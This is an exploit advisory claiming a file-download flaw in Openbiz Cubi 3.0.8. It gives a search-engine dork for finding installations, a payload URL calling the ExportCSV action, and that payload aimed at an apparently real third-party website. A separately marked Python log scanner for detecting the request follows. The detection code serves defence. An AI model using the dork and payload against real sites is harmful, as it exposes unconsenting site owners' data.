====================================================================================================================================
| # Title : Openbiz Cubi 3.0.8 Arbitrary File Download Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) |
| # Vendor : https://code.google.com/archive/p/openbiz-cubi/wikis/CubiCoreConcepts.wiki |
| # Dork : " System Login - Cubi Platform " |
====================================================================================================================================
poc :
[+] Dorking in Google or other search engine.
[+] Use payload : /bin/controller.php?F=Invoke&P0=[myaccount.form.EventLogListForm]&P1=[ExportCSV]&__this=btn_excel:onclick&_thisView=myaccount.view.MyEventLogView&qry_ipaddr=&myaccount_form_EventLogListForm_page_selector=1&myaccount_form_EventLogListForm_page_selector=1&myaccount_form_EventLogListForm_pagesize_selector=10&myaccount_form_EventLogListForm_pagesize_selector=10&_selectedId=
[+] http://www.elbaklawy-group.com/booth/bin/controller.php?F=Invoke&P0=[myaccount.form.EventLogListForm]&P1=[ExportCSV]&__this=btn_excel:onclick&_thisView=myaccount.view.MyEventLogView&qry_ipaddr=&myaccount_form_EventLogListForm_page_selector=1&myaccount_form_EventLogListForm_page_selector=1&myaccount_form_EventLogListForm_pagesize_selector=10&myaccount_form_EventLogListForm_pagesize_selector=10&_selectedId=
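
Detection sketch for the request shown above, added here as an example and not part of the original advisory: it scans web server access logs for controller.php calls with F=Invoke and P1=[ExportCSV]. The combined log format, the function names and the sample log lines (including the LoginForm entry) are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined-format access log entry (the log format is an assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def is_cubi_export(target):
    """True when a request target matches the advisory's payload shape:
    .../bin/controller.php with F=Invoke and P1=[ExportCSV]."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/bin/controller.php"):
        return False
    # parse_qs percent-decodes values, so %5BExportCSV%5D is caught as well.
    query = parse_qs(parts.query, keep_blank_values=True)
    funcs = [v.lower() for v in query.get("F", [])]
    # Values are compared case-insensitively (a conservative choice).
    methods = [v.strip("[] ").lower() for v in query.get("P1", [])]
    return "invoke" in funcs and "exportcsv" in methods

def scan(lines):
    """Return (client_ip, http_status, P0 form name) for each matching request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_cubi_export(m.group("target")):
            continue
        query = parse_qs(urlsplit(m.group("target")).query)
        form = query.get("P0", ["?"])[0]
        hits.append((m.group("ip"), int(m.group("status")), form))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [01/Mar/2019:10:00:00 +0000] "GET /bin/controller.php?F=Invoke'
    '&P0=[myaccount.form.EventLogListForm]&P1=[ExportCSV]&__this=btn_excel:onclick'
    ' HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Mar/2019:10:00:05 +0000] "GET /cubi/bin/controller.php?F=Invoke'
    '&P0=%5Bmyaccount.form.EventLogListForm%5D&P1=%5BExportCSV%5D HTTP/1.1" 302 0',
    '198.51.100.7 - - [01/Mar/2019:10:01:00 +0000] "GET /bin/controller.php?F=Invoke'
    '&P0=[user.form.LoginForm]&P1=[Login] HTTP/1.1" 200 900',
    '198.51.100.8 - - [01/Mar/2019:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    for ip, status, form in scan(SAMPLE):
        print(f"{ip} status={status} form={form}")
```

The status code is reported with each hit so the reviewer can see whether the export was actually served to that client.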
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================